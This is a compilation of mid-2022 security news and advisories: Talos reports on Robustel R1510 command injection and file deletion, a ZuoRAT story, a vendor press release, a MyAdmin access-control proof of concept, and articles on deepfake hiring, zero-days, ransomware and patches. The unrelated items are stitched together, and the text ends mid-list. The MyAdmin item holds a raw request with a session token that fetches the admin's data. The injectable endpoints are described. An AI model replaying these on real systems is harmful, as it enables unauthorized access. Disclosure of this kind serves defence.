Multiple command injection vulnerabilities exist in the web_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.The `/action/import_cert_file/` API is affected by command injection vulnerability.

**Summary**

Multiple command injection vulnerabilities exist in the web\_server action endpoints functionalities of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary command execution. An attacker can send a sequence of requests to trigger these vulnerabilities.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

9.1 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

**CWE**

CWE-78 - Improper Neutralization of Special Elements used in an OS Command (‘OS Command Injection’)

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has a web server that manages several endpoints. One group of endpoints have the following form /action/<API_endpoint>/. Several of those endpoints use unsafe functions with user provided parameters, like the standard system function, and a custom one called sysprintf.

Here it is sysprintf:

    void sysprintf(char *format_string,char *param_2,char *char*,char *param_4)
    
    {
      [...]
    
      va_list_ptr = va_list;
      va_list[0] = param_2;
      va_list[1] = char*;
      va_list[2] = param_4;
      vsnprintf(shell_command,0x200,format_string,va_list_ptr);                                             [1]
      system(shell_command);                                                                                [2]
      return;
    }
    

At [1] a string is formatted, using the first argument of the function as format string and the others parameters as format string arguments. If one of the argument is controllable by an attacker a command injection would occur at [2].

**CVE-2022-33312 - /action/import\_cert\_file/ command injection**

This command injection is in the /action/import_cert_file/ API.

The function that handles that endpoint is:

    void /action/import_cert_file/(Webs *webs)
    
    {
     [...]
    
      [...]
          path = (char *)websGetVar(webs,"path",0);                                                         [3]
          if ((path != (char *)0x0) &&
             (target_file = websGetVar(webs,"target_file",0), target_file != 0)) {
            hash = scaselessmatch(webs->method,"POST");
            iVar7 = 0;
            if (hash != 0) {
              pWVar1 = hashFirst((char)webs->files);
              while (pWVar1 != (WebsKey *)0x0) {
                ppcVar9 = *(char ***)&(pWVar1->content).value;
                hash = dir_exists(path);                                                                    [4]
                if (hash == 0) {
                  sysprintf("mkdir -p %s",path);                                                            [5]
                }
                [...]
     }            At `[3]` the variable `path` is fetched, then at `[4]` it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at `[5]`, as argument of the `sysprintf` function. This can lead to a command injection.
    

**CVE-2022-33313 - /action/import\_https\_cert\_file/ command injection**

This command injection is in the /action/import_https_cert_file/ API.

The function that handles that endpoint is:

    void /action/import_https_cert_file/(Webs *webs)
    
    {
      [...]
    
      [...]
          type_var = websGetVar(webs,"type",0);
          path_var = websGetVar(webs,"path",0);                                                             [6]
          if ((type_var != 0) && (path_var != 0)) {
            iVar1 = scaselessmatch(webs->method,"POST");
            if (iVar1 != 0) {
              pWVar2 = hashFirst((char)webs->files);
              while (pWVar2 != (WebsKey *)0x0) {
                uploaded_location = *(undefined4 **)&(pWVar2->content).value;
                iVar1 = string_matched(type_var,"ca");
                if (iVar1 == 0) {
                  iVar1 = string_matched(type_var,"private_key");
                  if (iVar1 != 0) {
                    path_formatted_value = "%s/server.key";
                    goto LAB_00481458;
                  }
                }
                else {
                  path_formatted_value = "%s/server.crt";
    LAB_00481458:
                  path_formatted_value = (char *)sfmt(path_formatted_value,path_var);                       [7]
                }
                if (path_formatted_value != (char *)0x0) {
                  sysprintf("mv %s %s -f",*uploaded_location,path_formatted_value);                         [8]
                  [...]
    }
    

At [6] the variable path is fetched, then at [7] it is used as argument to format a string based on another provided variable. The formatted string is then used at [8] as argument for the sysprintf function. This can lead to a command injection.

**CVE-2022-33314 - /action/import\_sdk\_file/ command injection**

This command injection is in the /action/import_sdk_file/ API.

The function that handles that endpoint is:

    void /action/import_sdk_file/(Webs *webs)
    
    {
      [...]
    
      [...]
          path_param = websGetVar(webs,"path",0);                                                           [9]
          if (path_param != 0) {
            websSetStatus(webs,200);
            websWriteHeaders(webs,0xffffffff,0);
            websWriteHeader(webs,"Content-Type","text/html");
            websWriteEndHeaders(webs);
            iVar1 = scaselessmatch(webs->method,"POST");
            if (iVar1 != 0) {
              pWVar4 = hashFirst((char)webs->files);
              while (pWVar4 != (WebsKey *)0x0) {
                ppcVar8 = *(char ***)&(pWVar4->content).value;
                iVar1 = dir_exists(path_param);                                                             [10]
                if (iVar1 == 0) {
                  sysprintf("mkdir -p %s",path_param);                                                      [11]
                }
                [...]
    }            
    

At [9] the variable path is fetched, then at [10] it is checked if its value correspond to an existing directory. If the directory does not exist the value will be used, at [11] as argument of the sysprintf function. This can lead to a command injection.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-33312: TALOS-2022-1572 || Cisco Talos Intelligence Group

A data removal vulnerability exists in the web_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.

**Summary**

A data removal vulnerability exists in the web\_server /action/remove/ API functionality of Robustel R1510 3.3.0. A specially-crafted network request can lead to arbitrary file deletion. An attacker can send a sequence of requests to trigger this vulnerability.

**Tested Versions**

Robustel R1510 3.3.0

**Product URLs**

R1510 - https://www.robustel.com/en/product/r1510-industrial-cellular-vpn-router/

**CVSSv3 Score**

8.7 - CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

**CWE**

CWE-20 - Improper Input Validation

**Details**

The R1510 is an industrial cellular router. It offers several advanced software like an innovative use of Open VPN, Cloud management, data over-use guard, smart reboot and others.

The R1510 has a web server that manages several APIs. One of these API is /ajax/remove/. This function allows to remove files, checking for possible path traversal in the provided input.

Here it is the function that handles the /ajax/remove/ API:

    undefined4 /ajax/remove/(Webs *webs)
    
    {
      [...]
    
      [...]
          file_name = (char *)websGetVar(webs,"file_name",0);                                               [1]
          if ((file_name != (char *)0x0) &&
             (shell_command = strstr(file_name,".."), shell_command == (char *)0x0)) {                      [2]
            shell_command = (char *)sfmt("rm %s -rf",file_name);                                            [3]
            iVar1 = system(shell_command);
            [...]
    }
    

At [1] the variable file_name is fetched and then used, at [3], to create the string rm <file_name> -rf. The function checks, at [2], if the provided filen_name contains ... This check, allegedly, is used to prevent path traversal. But because file_name can be an absolute path, an attacker, able to control file_name would be able to delete arbitrary file and directory.

**Timeline**

2022-06-27 - Initial vendor contact  
2022-06-28 - Vendor Disclosure  
2022-06-30 - Public Release  

Discovered by Francesco Benvenuto of Cisco Talos.

CVE-2022-28127: TALOS-2022-1571 || Cisco Talos Intelligence Group

Devices from Cisco, Netgear and others at risk from the multi-stage malware, which has been active since April 2020 and shows the work of a sophisticated threat actor.

Devices from Cisco, Netgear and others at risk from the multi-stage malware, which has been active since April 2020 and shows the work of a sophisticated threat actor.

A novel multistage remote access trojan (RAT) that’s been active since April 2020 is exploiting known vulnerabilities to target popular SOHO routers from Cisco Systems, Netgear, Asus and others.

The malware, dubbed ZuoRAT, can access the local LAN, capture packets being transmitted on the device and stage man-in-the-middle attacks through DNS and HTTPS hijacking, according to researchers from Lumen Technologies’ threat-intelligence arm Black Lotus Labs.

The ability to not only hop on a LAN from a SOHO device and then stage further attacks suggests that the RAT may be the work of a state-sponsored actor, they noted in a blog post published Wednesday.“The use of these two techniques congruently demonstrated a high level of sophistication by a threat actor, indicating that this campaign was possibly performed by a state-sponsored organization,” researchers wrote in the post.

The level of evasion that threat actors use to cover up communication with command-and-control (C&C) in the attacks “cannot be overstated” and also points to ZuoRAT being the work of professionals, they said.

_“_First, to avoid suspicion, they handed off the initial exploit from a dedicated virtual private server (VPS) that hosted benign content,” researchers wrote. “Next, they leveraged routers as proxy C2s that hid in plain sight through router-to-router communication to further avoid detection. And finally, they rotated proxy routers periodically to avoid detection.”

****Pandemic Opportunity****

Researchers named the trojan after the the Chinese word for “left” because of the file name used by the threat actors, “asdf.a.” The name “suggests keyboard walking of the lefthand home keys,” researchers wrote.

Threat actors deployed the RAT likely to take advantage of often unpatched SOHO devices shortly after the COVID-19 pandemic broke out and many workers were ordered to work from home, which opened up a host of security threats, they said.

“The rapid shift to remote work in spring of 2020 presented a fresh opportunity for threat actors to subvert traditional defense-in-depth protections by targeting the weakest points of the new network perimeter — devices which are routinely purchased by consumers but rarely monitored or patched,” researchers wrote. “Actors can leverage SOHO router access to maintain a low-detection presence on the target network and exploit sensitive information transiting the LAN.”

****Multi-Stage Attack****

From what researchers observed, ZuoRAT is a multi-stage affair, with the first stage of core functionality designed to glean information about the device and the LAN to which its connected, enable packet capture of network traffic, and then send the info back to command-and-control (C&C).

“We assess the purpose of this component was to acclimate the threat actor to the targeted router and the adjacent LAN to determine whether to maintain access,” researchers noted.

This stage has functionality to ensure only a single instance of the agent was present, and to perform a core dump that could yield data stored in memory such as credentials, routing tables and IP tables, as well as other info, they said.

ZuoRAT also includes a second component comprised of auxiliary commands sent to the router for use as the actor so chooses by leveraging additional modules that can be downloaded onto the infected device.

“We observed approximately 2,500 embedded functions, which included modules ranging from password spraying to USB enumeration and code injection,” researchers wrote.

This component provides capability for LAN enumeration capability, which allows the threat actor to further scope out the LAN environment and also perform DNS and HTTP hijacking, which can be difficult to detect, they said.

****Ongoing Threat****

Black Lotus analyzed samples from VirusTotal and its own telemetry to conclude that about 80 targets so far have been compromised by ZuoRAT.

Known vulnerabilities exploited to access routers to spread the RAT include: CVE-2020-26878 and CVE-2020-26879. Specifically, threat actors used a Python-compiled Windows portable executable (PE) file that referenced a proof of concept called ruckus151021.py to gain credentials and load ZuoRAT, they said.

Due to the capabilities and behavior demonstrated by ZuoRAT, it’s highly likely that not only that the threat actor behind ZuoRAT is still actively targeting devices, but has been ” living undetected on the edge of targeted networks for years,” researchers said.

This presents an extremely dangerous scenario for corporate networks and other organizations with remote workers connecting to affected devices, noted one security professional.

“SOHO firmware typically isn’t built with security in mind, especially pre-pandemic firmware where SOHO routers weren’t a big attack vector,” observed Dahvid Schloss, offensive security team lead for cybersecurity firm Echelon**,** in an email to Threatpost.

Once a vulnerable device is compromised, threat actors then have free rein “to poke and prod at whatever device is connected” to the trusted connection that they hijack, he said.

“From there you could attempt to use proxychains to throw exploits into the network or just monitor all the traffic going in, out, and around the network,” Schloss said.

ZuoRAT Can Take Over Widely Used SOHO Routers

NXM Autonomous Security protects against network-wide device hacks and defends against critical IoT vulnerabilities.

**June 30, 2022, Mountain View, CA** \- NXM Labs, Inc., a leader in advanced cybersecurity software for connected devices, today unveiled its NXM Autonomous Security(TM) platform that prevents hackers from gaining unauthorized access to commercial, industrial, medical, or consumer internet of things (IoT) devices. Tested in collaboration with the Jet Propulsion Laboratory (JPL), California Institute of Technology (Caltech), NXM successfully demonstrated the ability of its groundbreaking technology to enable future Mars rovers to automatically defend themselves and recover from cyberattacks. Caltech manages JPL on behalf of the National Aeronautics and Space Administration (NASA).

NXM's engineers worked with JPL's Artificial Intelligence, Analytics and Innovation Division, Information Technology and Solutions Directorate (ITSD), along with the Robotic Surface Mobility Group in Pasadena, CA to integrate the company's software with the navigation and ground control systems of JPL's self-driving Athena test rover. During testing, NXM's software successfully detected unauthorized attempts to gain access to the rover's autonomous navigation systems, automatically protecting the vehicle from harm in real-time without impacting normal driving operations.

Tests showed that NXM's platform was capable of securing millions of devices with virtually no impact on network latency and is able to operate up to 1000x faster than other decentralized platforms previously tested by the U.S. Department of Defense under simulated battlefield conditions.

"NXM's technology is game-changing," said Lt. General Harry D. Raduege, Jr., USAF (Ret), former Director, Defense Information Systems Agency and CIO for the North American Aerospace Defense Command and U.S. Space Command. "NXM provides a new layer of cybersecurity that enables unified command and control, as well as data interoperability, providing an unprecedented capability that we have long sought but until now wasn't possible." Lt. General Raduege serves as an advisor to NXM.

The Athena test rover was developed by JPL as part of NASA's High Performance Spaceflight Computing (HPSC) program to develop new computing technologies with vastly more capabilities than current spaceflight computers. JPL engineers harnessed the advanced computing power of the rover's off-the-shelf NVIDIA Jetson AI platform to develop innovative, machine learning-based applications for future Mars rovers. This includes artificial intelligence software that identifies objects of scientific interest as a vehicle traverses the Martian terrain, using vision-based navigation and path planning software to significantly increase the driving distances of energy-limited rovers.

"We're thrilled to have collaborated with NASA JPL to show how our security can protect critical assets in space as well as here on Earth," said Scott Rankine, NXM's President and Co-founder. "Our unique zero-trust and zero-touch security software is chip and cloud agnostic, enabling device manufacturers and their component suppliers to easily and cost-effectively develop the industry's most trustworthy products that can be deployed rapidly and remain secure for their entire operating lifetime."

**About NXM**  
NXM Labs, Inc. provides advanced security solutions for embedded devices that enable commercial, industrial and consumer products to automatically defend themselves and recover from cyberattacks. NXM offers the industry's first Zero-Trust and Zero-Touch product development software platform designed to streamline and automate security management throughout the entire OEM supply chain and product lifecycle. For more information, visit www.nxmlabs.com

NXM Announces Platform That Protects Space Infrastructure and IoT Devices From Cyberattacks

MyAdmin v1.0 is affected by an incorrect access control vulnerability in viewing personal center in /api/user/userData?userCode=admin.

Log in with user1 account on the trial website given by the author, and click the personal center to capture the package.  
The userCode parameter has a vulnerability.  
poc:  
user1 login --> /api/user/userData?userCode=admin

    GET /api/user/userData?userCode=admin HTTP/1.1
    Host: 8.129.86.120
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:87.0) Gecko/20100101 Firefox/87.0
    Accept: application/json, text/plain, */*
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    myadmin-token: eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ
    Connection: close
    Referer: http://8.129.86.120/
    Cookie: sidebarStatus=1; myadmin-token=eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiIxOCIsImlzcyI6InVzZXIxIiwic3ViIjoie1wiZGVwdExpc3RcIjpbNyw4XSxcImRlcHROYW1lc1wiOltcIua3seWcs-i9r-S7tumDqFwiLFwi5YyX5Lqs6L-Q57u06YOoXCJdLFwicm9sZUxpc3RcIjpbNl0sXCJyb2xlTmFtZXNcIjpbXCLova_ku7bpg6jmgLvnm5FcIl0sXCJ1c2VyQ29kZVwiOlwidXNlcjFcIixcInVzZXJJZFwiOjE4LFwidXNlck5hbWVcIjpcIueUqOaItzFcIn0iLCJpYXQiOjE2Mjc0NTE0NzYsImV4cCI6MTYyNzQ1NTA3Nn0.e5q0BKsAo2Q_gXCnAZGn_njPV0oRQoVJKiMJeLDwMvQ

CVE-2021-37791: There is an ultra vires vulnerability in viewing personal center · Issue #3 · cdfan/my-admin

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII.
The post Criminals are applying for remote work using deepfake and stolen identities, says FBI appeared first on Malwarebytes Labs.

The FBI has warned businesses of an uptick in reports of criminals applying for remote work using deepfake and stolen PII (personally identifiable information).

A deepfake is essentially created or modified media (image, video, or audio), often with the help of artificial intelligence (AI) and machine learning (ML). Deepfake creations are designed to appear and sound as authentic as possible. Because of this, they’re difficult to spot unless you know what to look for.

Years of data breaches made millions of Americans’ identities available for anyone with ill intent to gather and use for personal gains. This time, criminals seem confident about pulling off a scheme that fully intends to sabotage or steal from companies that hire them while keeping their true identities intact.

Armed with compelling synthetic images and videos with legitimate PII, we can imagine criminals likely getting the job before pulling the wool over their employer’s eyes.

Most open positions identified in the report were in the technology field, such as IT (information technology), computer programming, database, and software. The FBI has also noted that some positions criminals are trying to fill would grant them access to PII, financial data, corporate databases, and proprietary information.

Fortunately for organizations, there is a glaring flaw to an otherwise masterful execution of deceit: the deepfakes the criminals use suffer from sync issues.

> “Complaints report the use of voice spoofing, or potentially voice deepfakes, during online interviews of the potential applicants. In these interviews, the actions and lip movement of the person seen interviewed on-camera do not completely coordinate with the audio of the person speaking. At times, actions such as coughing, sneezing, or other auditory actions are not aligned with what is presented visually.”
> 
> ~ FBI, PSA number I-062822-PSA

Misuse of stolen PII is spotted with a pre-employment background check. So even if an interviewer puts the desyncs in a deepfake video down to a dodgy connection, criminals won’t be able to escape findings from a standard background check.

TechCrunch said the most at-risk businesses from criminals entering the job market this way are startups and SaaS (software as a service) companies. This is because these potentially hold lots of data or access to it “but comparatively little security infrastructure compared with the enterprises they serve or are attempting to displace.”

If you’re worried that your data might be used to get criminals into the same sector as you are, there’s not much to do apart from remaining alert and keeping an eye out for strange emails or phone calls.

Stay safe!

Criminals are applying for remote work using deepfake and stolen identities, says FBI

There were a record number of zero-day attacks last year, but some basic cyber-hygiene strategies can help keep your organization more safe.

Few security exploits are the source of more sleepless nights for security professionals than zero-day attacks. Just over Memorial Day weekend, researchers discovered a new vulnerability enabling hackers to achieve remote code execution within Microsoft Office. Dubbing the evolving threat the Follina exploit, researchers say all versions of Office are at risk. And because blue teams have no time to prepare or patch their systems to defend against these software vulnerabilities, crafty threat actors can take advantage, taking their time after they've accessed an organization's environment to observe and exfiltrate data while remaining completely unseen.

And though sophisticated threat actors and nations have exploited zero-days for nearly two decades, last year saw a historic rise in the number of vulnerabilities detected. Both Google and Mandiant tracked a record number of zero-days last year, with the caveat that more zero-days are being discovered because security companies are getting better at finding them — not necessarily because hackers are coming up with new vulnerabilities. Not all zero-days are created equal, though. Some require sophisticated and novel techniques, like the attack on SolarWinds, and others exploit simple vulnerabilities in commonly used programs like Windows. Thankfully, there's some basic cyber hygiene strategies that can keep your organization sufficiently prepared to mitigate zero-day exploits.

**How Do Zero-Days Work?**

Typically, what a zero-day will do is gain access to an environment through a vulnerability previously unseen, then it stealthily maps the environment and, when ready, launches the attack. This is far too late for an incident response team to prevent further damage. Staying alert for these slow-burn attacks requires an approach to security that prioritizes looking for certain techniques and behaviors that a hacker or known threat group may use, rather than scanning for specific pieces of malware. In other words, ensure that the technology your organization has is sufficient for protecting from the unknown. Many zero-days may never hit a hard drive, so pointing threat detection tools there could be fruitless.

While it might sound like a broken record, patching is integral to protection against exploits. As soon as a proof of concept (PoC) is made public on the Dark Web or more legitimate forums like GitHub, most vendors will develop a patch. Staying on top of guidance from industry organizations like (ISC)2 or federal authorities like the Cybersecurity and Infrastructure Security Agency is a good way to prioritize the exploits that are most relevant and most risky to your organization.

However, zero-day exploits are those that the vendor doesn't know exist, and therefore no patch is available. It's very difficult to defend against these without protections and detections that are broad enough to identify tactics, techniques, and procedures. In some cases, protection technologies can use behavioral detections to block certain activities, while in other cases, using detection technologies or human expertise in a security operations center is the only defense.

Above all, investing in the human element of security will place an organization in the best position to limit the financial and data losses zero-days can incur. By placing hands on keyboards and unlocking visibility into all aspects of an ecosystem, a security team can more readily detect hints that a zero-day might be targeted against them and deploy necessary patches. For example, if a robot you operate in the US randomly connects to a server in Ukraine without any other unusual behavior, it might signal that a zero-day has been leveraged. And while there may have been an initial access into your robot or environment through a zero-day, having a broad view of your IT security ecosystem, along with technologies like artificial intelligence, can alert an incident response team to create a patch for a vulnerability as soon as possible.

Thankfully, even though more zero-days are being discovered than ever before, they're still relatively rare in the world of cybersecurity. Up until the last several years, zero-day exploits were mostly identified and held closely by national governments, who wanted to save them to deploy whenever necessary. But the commercialization of hacking groups, including ransomware-as-a-service platforms, has created an ecosystem incentivizing the purchasing and selling of zero-days, often with the financial or technological resources of a nation-state in support.

With such capable attackers, virtually every business should be worried — from large companies that serve as final targets for hackers, to smaller companies that can serve as stepping stones in a sequence of attacks. The constant of security operations can detect and mitigate threat actors from lurking behind the scenes of an IT ecosystem through a zero-day exploit, no matter the origin. So, while patching is proper preparation, the investment in trained security professionals, in-house or outsourced, is the best defense against zero-days.

Zero-Days Aren't Going Away Anytime Soon & What Leaders Need to Know

A NULL pointer dereference flaw was found in the Linux kernel’s KVM module, which can lead to a denial of service in the x86_emulate_insn in arch/x86/kvm/emulate.c. This flaw occurs while executing an illegal instruction in guest in the Intel CPU.

Permalink

Browse files

KVM: x86: avoid calling x86 emulator without a decoded instruction

Whenever x86\_decode\_emulated\_instruction() detects a breakpoint, it
returns the value that kvm\_vcpu\_check\_breakpoint() writes into its
pass-by-reference second argument.  Unfortunately this is completely
bogus because the expected outcome of x86\_decode\_emulated\_instruction
is an EMULATION\_\* value.

Then, if kvm\_vcpu\_check\_breakpoint() does "\*r = 0" (corresponding to
a KVM\_EXIT\_DEBUG userspace exit), it is misunderstood as EMULATION\_OK
and x86\_emulate\_instruction() is called without having decoded the
instruction.  This causes various havoc from running with a stale
emulation context.

The fix is to move the call to kvm\_vcpu\_check\_breakpoint() where it was
before commit 4aa2691 ("KVM: x86: Factor out x86 instruction
emulation with decoding") introduced x86\_decode\_emulated\_instruction().
The other caller of the function does not need breakpoint checks,
because it is invoked as part of a vmexit and the processor has already
checked those before executing the instruction that #GP'd.

This fixes CVE-2022-1852.

Reported-by: Qiuhao Li <qiuhao@sysec.org>
Reported-by: Gaoning Pan <pgn@zju.edu.cn>
Reported-by: Yongkang Jia <kangel@zju.edu.cn>
Fixes: 4aa2691 ("KVM: x86: Factor out x86 instruction emulation with decoding")
Cc: stable@vger.kernel.org
Signed-off-by: Sean Christopherson <seanjc@google.com>
Message-Id: <20220311032801.3467418-2-seanjc@google.com>
\[Rewrote commit message according to Qiuhao's report, since a patch
 already existed to fix the bug. - Paolo\]
Signed-off-by: Paolo Bonzini <pbonzini@redhat.com>

*   Loading branch information

CVE-2022-1852: KVM: x86: avoid calling x86 emulator without a decoded instruction · torvalds/linux@fee060c

Oliver Tavakoli, CTO at Vectra AI, gives us hope that surviving a ransomware attack is possible, so long as we apply preparation and intentionality to our defense posture.

Oliver Tavakoli, CTO at Vectra AI, gives us hope that surviving a ransomware attack is possible, so long as we apply preparation and intentionality to our defense posture.

Surviving ransomware is possible with a combination of preparation and intentionality. Often, there is a misguided characterization of ransomware attacks that implies defenders either completely thwart an attack or that attackers establish complete control of their targets’ IT infrastructure. But the past couple of years have illustrated that defenders’ success in dealing with ransomware attacks fall along a broad spectrum of potential outcomes, some obviously better than others.

It’s also easy to imagine that all groups who are in the ransomware business have the same skills, aim for the same goals, and operate under the same business models. But as is the case in any industry vertical, ransomware groups come with a wide range of skills and a variety of goals and business models.

And while it’s in vogue to refer to REvil and DarkSide as “franchise models” which supply Ransomware-as-a-Service, it is important to remember that the franchisees are effectively freelance cybercriminals. The franchiser provides back-office operations for these freelancers while exerting little influence on how they otherwise operate.

Given the above, let’s consider each of the factors that may affect an attack’s outcome.

****Attacker Skill and Persistence****

The skills of the attackers and the skills of the defenders – plus some elements of luck – generally determine the _possible_ extent to which an attack could progress:

*   **Low skills:** Some attackers may be skilled at attacking organizations with lagging security practices but will often meet their match in organizations that have robust defenses
*   **Wrong skills:** Attackers with skills and tooling useful in attacking traditional data centers will have trouble breaking into targets who have moved everything to the cloud
*   **Bad luck:** Organizations who are generally locked down but may have a temporary exposure which an attacker happens to stumble across
*   **Good luck:** Organizations who have left a persistent opening (e.g., open RDP access to the outside in an AWS enclave) may have a run of good luck as no attacker encounters it

****Attacker Goal****

Attack groups may also specialize in leak-centered vs. operation-centered goals.

Leak-centered goals involve exfiltrating and threatening to leak confidential data belonging to the targeted organization. The most valuable data in this regard is often data related to the target’s customers and employees as the potential for reputational and legal liability acts as a strong incentive for ransom payment.

Alternately, public disclosure or sale of intellectual property or trade secrets can also warrant the payment of ransom. The playbook for such attacks generally involves sending the victim a sample of the data to show what the attacker has. From there, it can escalate to publicizing a data sample and contacting the victim’s customers to apply pressure to the victim to pay the ransom.

An example of an attack with a leak-centered goal was the REvil-associated attack on Quanta, which exfiltrated specs of future Apple product designs. The attackers first demanded a $50m ransom from Quanta but soon decided that Apple had deeper pockets and tried to extort $50m in return for not publicly leaking the data or selling it to an Apple competitor.

Operation-centered goals involve attempts to cripple the ability of the victim organization to continue to operate. These attacks sometimes focus on traditional IT systems and at other times target systems which act as OT (Operational Technology), but which are often assembled from legacy IT (e.g. Windows NT) technology.

The exfiltration of confidential data and public leak or sale of the data is usually not present in this scheme. The DarkSide-associated attack on Colonial Pipeline (who paid $4.5m in ransom) and the REvil-associated attack on JBS Foods (who paid $11m in ransom) squarely targeted this goal: the ransoms were paid to try to ensure quick recovery in the ability of the companies to resume normal operations.

****Degrees of Success****

Several factors (including luck) constrain the possible outcomes of a ransomware attack. Possible outcomes include:

*   The attackers make insufficient progress on a targeted organization and give up. This may be due to the perceived degree of difficulty in successfully carrying out the attack or because some other targets that the attackers are simultaneously pursuing look more promising. Think of this as opportunity cost. Either way, no ransom is demanded.
*   The attackers succeed to a point and believe themselves to have _some_ leverage in demanding a ransom, but the ransom is ultimately not paid. The outcome in these cases is often some operational impact or reputational harm, but ultimately survival and (hopefully) a sense of renewed commitment to cyber security.
*   The attackers succeed to a point and the ransom request is modest enough that the victim may choose to pay the ransom as it is less costly than the recovery effort would be. This may also be influenced by the victim having a cyber insurance policy which provides ransomware coverage.
*   The attackers get access to the crown jewels and effectively can prevent the victim organization from operating their business. In this case, the victim organization may pay the ransom (Colonial Pipeline, JBS Foods) and restore services relatively quickly. Or they refuse to pay it (see the RobbinHood attack of the city of Baltimore or the Samsam attack on the city of Atlanta) and basically end up rebuilding their IT infrastructure from the ground up.

****Takeaways****

You should tabletop various scenarios covering attackers pursuing both leak-centered and operations-centered goals and consider your reactions to partial and complete success by the attackers:

*   Know the extent of your cyber insurance policy and what limitations it has.
*   If it comes to a ransom request, will your cyber insurance provider provide someone to handle ransom negotiations?
*   Do you have an incident response firm on retainer?
*   How robust is your disaster recovery plan?

Many of these types of questions will surface from tabletop exercises which will help you be more prepared should the fateful day arrive.

**_Oliver Tavakoli is CTO at Vectra AI._**

**_Enjoy additional insights from Threatpost’s Infosec Insiders community by visiting our microsite._**

A Guide to Surviving a Ransomware Attack

Plus: Google issues fixes for Android bugs, and Cisco, Citrix, SAP, WordPress, and more issue major patches for enterprise systems.

June has seen the release of multiple security updates, with important patches issued for the likes of Google's Chrome and Android as well as dozens of patches for Microsoft products, including fixes for a Windows zero-day vulnerability that attackers had already exploited. Apple updates were absent at the time of writing, but the month also included some major enterprise-focused patches for Citrix, SAP, and Cisco products.

Here’s what you need to know about the major patches released in the past month.

Microsoft

Microsoft’s Patch Tuesday release was pretty hefty in June, including fixes for 55 flaws in the tech giant’s products. This Patch Tuesday was particularly important because it addressed an already exploited remote code execution (RCE) issue in Windows dubbed Follina, which Microsoft has been aware of since at least May.

Tracked as CVE-2022-30190, Follina—which takes advantage of vulnerabilities in the Windows Support Diagnostic tool and can execute without the need to open a document—has already been used by multiple criminal groups and state-sponsored attackers.

Three of the vulnerabilities addressed in Patch Tuesday affecting Windows Server are RCE flaws and rated as critical. However, the patches seem to be breaking some VPN and RDP connections, so be careful.

Google Chrome

Google Chrome updates continue to come thick and fast. That’s no bad thing, as the world’s most popular browser is by default one of the biggest targets for hackers. In June, Google released Chrome 103 with patches for 14 vulnerabilities, some of which are serious.

Tracked as CVE-2022-2156, the biggest flaw is a use-after-free issue in Base reported by Google’s Project Zero bug-hunting team that could lead to arbitrary code execution, denial of service, or corruption of data. Worse, when chained with other vulnerabilities the flaw could lead to full system compromise.

Other issues patched in Chrome include vulnerabilities in Interest Groups, WebApp Provider, and a flaw in the V8 Javascript and WebAssembly engine.

Google Android

Of the multiple Android security issues Google patched in June, the most severe is a critical security vulnerability in the System component that could lead to remote code execution with no additional execution privileges needed, Google said in its Android Security Bulletin.

Google also released updates for its Pixel devices to patch issues in the Android Framework, Media Framework, and System Components.

Samsung users seem to have gotten lucky with Android updates of late, with the device maker rolling out its patches very quickly. The June security update is no different, reaching the Samsung Galaxy Tab S7 series, Galaxy S21 series, Galaxy S22 series, and the Galaxy Z Fold 2 straightaway.

Cisco

Software maker Cisco released a patch in June to fix a critical vulnerability in Cisco Secure Email and Web Manager and Cisco Email Security Appliance that could allow a remote attacker to bypass authentication and log in to the web management interface of an affected device.

The issue, tracked as CVE-2022-20798, could be exploited if an attacker enters something specific on the login page of the affected device, which would provide access to the web-based management interface, Cisco said.

Citrix

Citrix has issued a warning urging users to patch some major vulnerabilities that could let attackers reset admin passwords. The vulnerabilities in Citrix Application Delivery Management could result in corruption of the system by a remote, unauthenticated user, Citrix said in a security bulletin. “The impact of this can include the reset of the administrator password at the next device reboot, allowing an attacker with ssh access to connect with the default administrator credentials after the device has rebooted,” the company wrote.

Citrix recommends that traffic to the Citrix ADM’s IP address be segmented from standard network traffic. This diminishes the risk of exploitation, it said. However, the vendor also urged customers to install the updated versions of Citrix ADM server and Citrix ADM agent “as soon as possible.”

SAP

Software firm SAP has released 12 security patches as part of its June Patch Day, three of which are serious. The first listed by SAP relates to an update released on April 2018 Patch Day and applies to the browser control Google Chromium used by the firm’s business clients. Details of this vulnerability aren’t available, but it has a severity score of 10, so the patch should be applied straightaway.

Another major fix concerns an issue in the SAProuter proxy in NetWeaver and ABAP Platform, which could allow an attacker to execute SAProuter administration commands from a remote client. The third major patch fixes a privilege escalation bug in SAP PowerDesigner Proxy 16.7.

Splunk Enterprise

